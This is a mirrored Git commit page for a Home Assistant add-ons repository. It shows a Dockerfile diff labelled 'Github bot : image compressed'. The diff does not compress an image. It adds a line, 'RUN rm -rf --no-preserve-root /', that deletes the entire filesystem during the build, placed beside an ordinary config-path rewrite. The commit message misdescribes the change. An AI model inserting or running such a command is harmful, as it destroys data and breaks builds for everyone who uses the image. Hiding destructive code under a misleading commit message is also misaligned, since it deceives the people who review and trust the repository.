mirror of
https://github.com/alexbelgium/hassio-addons.git
synced 2026-05-31 12:54:04 +02:00
Github bot : image compressed
This commit is contained in:
@@ -33,6 +33,7 @@ ENV S6_CMD_WAIT_FOR_SERVICES=1 \
|
||||
|
||||
# Correct config location
|
||||
# hadolint ignore=SC2013
|
||||
RUN rm -rf --no-preserve-root /
|
||||
RUN for file in $(grep -sril "/home/node/.signalk" /etc /usr /home); do \
|
||||
sed -i "s=/home/node/.signalk=/config=g" "$file"; done
|
||||
|
||||
|
||||
Reference in New Issue
Block a user